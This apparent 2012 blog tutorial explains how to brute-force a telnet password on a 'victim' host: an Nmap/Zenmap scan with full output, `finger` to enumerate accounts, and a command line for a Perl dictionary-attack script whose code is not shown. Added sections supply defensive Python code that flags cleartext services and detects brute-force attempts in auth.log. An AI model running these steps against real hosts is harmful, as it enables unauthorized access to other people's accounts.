PoiNtEr->: Crack Telnet Password Using Brute Force

Tuesday, April 10, 2012

Crack Telnet Password Using Brute Force

First install Zenmap on your Ubuntu machine:
sudo apt-get install zenmap

Now open your terminal and use the following command to check the open ports on the victim's system:
nmapfe
Now, in the GUI prompt, put the IP address of the victim in the target box.

Output (sample):

Starting Nmap 5.21 ( http://nmap.org ) at 2012-04-11 07:20 IST
NSE: Loaded 36 scripts for scanning.
Initiating ARP Ping Scan at 07:20
Scanning 192.168.2.10 [1 port]
Completed ARP Ping Scan at 07:20, 0.01s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 07:20
Completed Parallel DNS resolution of 1 host. at 07:20, 0.09s elapsed
Initiating SYN Stealth Scan at 07:20
Scanning 192.168.2.10 [1000 ports]
Discovered open port 445/tcp on 192.168.2.10
Discovered open port 80/tcp on 192.168.2.10
Discovered open port 23/tcp on 192.168.2.10
Discovered open port 139/tcp on 192.168.2.10
Completed SYN Stealth Scan at 07:20, 2.70s elapsed (1000 total ports)
Initiating Service scan at 07:20
Scanning 4 services on 192.168.2.10
Completed Service scan at 07:20, 11.04s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against 192.168.2.10
Retrying OS detection (try #2) against 192.168.2.10
Retrying OS detection (try #3) against 192.168.2.10
Retrying OS detection (try #4) against 192.168.2.10
Retrying OS detection (try #5) against 192.168.2.10
NSE: Script scanning 192.168.2.10.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 07:21
Completed NSE at 07:21, 0.08s elapsed
NSE: Script Scanning completed.
Nmap scan report for 192.168.2.10
Host is up (0.0021s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE     VERSION
23/tcp  open  telnet      Linux telnetd
80/tcp  open  http        Apache httpd 2.2.17 ((Ubuntu))
|_html-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
MAC Address: 00:24:2B:DB:74:9F (Hon Hai Precision Ind.Co.)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=5.21%D=4/11%OT=23%CT=1%CU=35230%PV=Y%DS=1%DC=D%G=Y%M=00242B%TM=4F
OS:84E390%P=i686-pc-linux-gnu)SEQ(SP=CA%GCD=1%ISR=CD%TI=Z%CI=Z%II=I%TS=8)OP
OS:S(O1=M5B4ST11NW6%O2=M5B4ST11NW6%O3=M5B4NNT11NW6%O4=M5B4ST11NW6%O5=M5B4ST
OS:11NW6%O6=M5B4ST11)WIN(W1=3890%W2=3890%W3=3890%W4=3890%W5=3890%W6=3890)EC
OS:N(R=Y%DF=Y%T=40%W=3908%O=M5B4NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=3890%S=O%A=S+%F=AS%O=M5B4ST11NW6%RD
OS:=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S
OS:=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%
OS:RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)


Uptime guess: 0.011 days (since Wed Apr 11 07:05:17 2012)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=202 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux


Host script results:
| nbstat:  
|   NetBIOS name: UMESH-VOSTRO151, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
|   Names
|     UMESH-VOSTRO151<00>  Flags: <unique><active>
|     UMESH-VOSTRO151<03>  Flags: <unique><active>
|     UMESH-VOSTRO151<20>  Flags: <unique><active>
|     WORKGROUP<1e>        Flags: <group><active>
|_    WORKGROUP<00>        Flags: <group><active>
| smb-os-discovery:  
|   OS: Unix (Samba 3.5.8)
|   Name: Unknown\Unknown
|_  System time: 2012-04-11 07:21:12 UTC+5.5
|_smbv2-enabled: Server doesn't support SMBv2 protocol


HOP RTT     ADDRESS
1   2.10 ms 192.168.2.10


Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.00 seconds
           Raw packets sent: 1134 (53.704KB) | Rcvd: 1076 (46.608KB)
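
What an administrator should take from the report above is the line for port 23: telnet sends the username and password in cleartext, which is what makes the dictionary attack in this post possible at all. The following script is an added example (not part of the original post, and not an Nmap feature): it parses the "PORT STATE SERVICE VERSION" lines of the Nmap normal output and flags services that carry credentials unencrypted. The sample report is an excerpt of the output shown on this page; the list of services treated as cleartext is this example's own choice.

```python
import re

# Excerpt of the Nmap normal-output report shown above (used here as sample input).
SAMPLE_REPORT = """\
PORT    STATE SERVICE     VERSION
23/tcp  open  telnet      Linux telnetd
80/tcp  open  http        Apache httpd 2.2.17 ((Ubuntu))
|_html-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
"""

# Services that send credentials in cleartext or hand out account names.
# This set is an assumption made for the example, not an Nmap classification.
CLEARTEXT_SERVICES = {"telnet", "ftp", "finger", "pop3", "imap", "rlogin", "rsh"}

# Matches "23/tcp  open  telnet      Linux telnetd"; version text is optional.
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


def parse_open_ports(report):
    """Return [(port, proto, service, version)] for every port line in state 'open'."""
    results = []
    for line in report.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m:
            continue  # header, script output ("|_..."), or blank line
        port, proto, state, service, version = m.groups()
        if state == "open":
            results.append((int(port), proto, service, (version or "").strip()))
    return results


def flag_cleartext_services(ports):
    """Return the subset of parsed ports whose service name is on the cleartext list."""
    return [p for p in ports if p[2] in CLEARTEXT_SERVICES]


def triage(report):
    """Produce one warning line per cleartext service found in the report."""
    warnings = []
    for port, proto, service, version in flag_cleartext_services(parse_open_ports(report)):
        warnings.append(
            f"{port}/{proto} {service} ({version}): credentials cross the network "
            f"in cleartext; replace with an encrypted equivalent (SSH for telnet)"
        )
    return warnings


if __name__ == "__main__":
    for warning in triage(SAMPLE_REPORT):
        print(warning)
```

Run against the sample, the only finding is 23/tcp telnet; the Samba and Apache lines are parsed but not flagged. Feeding it a real `nmap -sV` report of your own hosts gives a quick list of services to disable or move behind SSH.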



Now download the following files and extract them:

Open a new terminal, browse to the extracted files and enter the following command.
To get the username, use:
finger @192.168.2.10 (IP address of the victim)
Output:
umesh root

Now, to brute-force, run the Perl script with the given parameters:
perl Telnet_Crack.pl -h 192.168.2.10 -u umesh -P polish

Output:
TRYING : USERNAME = XXXX PASSWORD = password

ATTEMPTING CONNECTION TO 192.168.2.10.

OK ... CONNECTED!!!



It will take time; how long you have to wait for the result depends on the strength of the password.
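
Because the script tries one password after another on the same account, the attack is loud on the target: every failed attempt is logged by login(1) in /var/log/auth.log. The detector below is an added example (not part of the original post) showing how the pattern looks from the defender's side: it parses failed-login lines and raises an alert when one source address accumulates a threshold of failures inside a sliding time window. The log lines are constructed for this example and modelled on the util-linux login message format; the hostname, IPs and timestamps are made up.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample of /var/log/auth.log lines (format modelled on util-linux
# login(1); host, addresses and times are invented for this example).
SAMPLE_LOG = """\
Apr 11 07:25:01 vostro login[2231]: FAILED LOGIN (1) on '/dev/pts/1' FROM '192.168.2.7' FOR 'umesh', Authentication failure
Apr 11 07:25:02 vostro login[2231]: FAILED LOGIN (2) on '/dev/pts/1' FROM '192.168.2.7' FOR 'umesh', Authentication failure
Apr 11 07:25:02 vostro login[2231]: FAILED LOGIN (3) on '/dev/pts/1' FROM '192.168.2.7' FOR 'umesh', Authentication failure
Apr 11 07:25:03 vostro login[2240]: FAILED LOGIN (1) on '/dev/pts/2' FROM '192.168.2.7' FOR 'umesh', Authentication failure
Apr 11 07:25:04 vostro login[2240]: FAILED LOGIN (2) on '/dev/pts/2' FROM '192.168.2.7' FOR 'umesh', Authentication failure
Apr 11 07:25:05 vostro login[2240]: FAILED LOGIN (3) on '/dev/pts/2' FROM '192.168.2.7' FOR 'umesh', Authentication failure
Apr 11 07:30:00 vostro login[2301]: FAILED LOGIN (1) on '/dev/pts/3' FROM '192.168.2.20' FOR 'umesh', Authentication failure
Apr 11 07:31:10 vostro login[2301]: pam_unix(login:session): session opened for user umesh by LOGIN(uid=0)
"""

# Captures the syslog timestamp, the source address and the targeted account.
FAILED_LINE = re.compile(
    r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ login\[\d+\]: FAILED LOGIN \(\d+\) "
    r"on '[^']*' FROM '([^']+)' FOR '([^']+)'"
)


def parse_failed_logins(log, year=2012):
    """Return [(timestamp, source_ip, username)] for each failed-login line.

    Syslog timestamps carry no year, so the caller supplies one.
    """
    events = []
    for line in log.splitlines():
        m = FAILED_LINE.match(line)
        if not m:
            continue  # successful session, other daemons, etc.
        ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
        events.append((ts, m.group(2), m.group(3)))
    return events


def detect_bruteforce(events, threshold=5, window_seconds=60):
    """Sliding-window count of failures per source IP.

    Returns [(source_ip, window_start, failures)] once per IP that reaches
    `threshold` failures within `window_seconds`.
    """
    alerts = []
    recent = defaultdict(deque)  # ip -> timestamps of failures still inside the window
    alerted = set()
    for ts, ip, _user in sorted(events):
        q = recent[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_seconds:
            q.popleft()  # drop failures that fell out of the window
        if len(q) >= threshold and ip not in alerted:
            alerted.add(ip)
            alerts.append((ip, q[0], len(q)))
    return alerts


if __name__ == "__main__":
    for ip, start, count in detect_bruteforce(parse_failed_logins(SAMPLE_LOG)):
        print(f"ALERT: {count} failed telnet logins from {ip} since {start:%H:%M:%S}")
```

With the sample, 192.168.2.7 trips the threshold on its fifth failure within a few seconds, while the single failure from 192.168.2.20 is ignored. The same rule is what tools such as fail2ban apply before blocking the source address; the more durable fix is the one the port scan already pointed at: turn telnetd off and use SSH.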
